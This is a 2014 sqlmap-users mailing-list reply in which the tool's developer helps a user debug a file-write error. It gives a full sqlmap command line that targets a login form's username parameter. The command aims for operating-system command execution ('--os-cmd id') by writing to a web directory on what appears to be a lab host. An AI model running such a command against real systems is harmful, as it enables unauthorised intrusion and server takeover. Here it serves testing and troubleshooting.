Re: [sqlmap-users] File Write Error
Brought to you by:
inquisb
From: Bernardo D. A. G. <ber...@gm...> - 2014-03-21 12:02:19
|
On 21 March 2014 11:57, Bernardo Damele A. G. <ber...@gm...> wrote: > [...] > All in all, can you please relaunch sqlmap (make sure you run git pull > first to sync to the GitHub repository) with the following syntax: Command line: python sqlmap.py -u "http://172.16.71.138:7879/index.php" --data="act=auth-login&pag=login&username=admin&password=admin" -p username --threads=10 --dbms=mysql --level=5 --risk=3 --os-cmd id -v 3 --parse-errors -t traffic.log --answers "language does the web server support=4,do you want to use for writable=2,comma separate list of absolute directory paths=C:/Progra~1/Cyclope/ni4zlja/,retrieve the=Y" Feel free to report back the result, the entire standard output of sqlmap and send me the traffic.log. Thank you. Bernardo |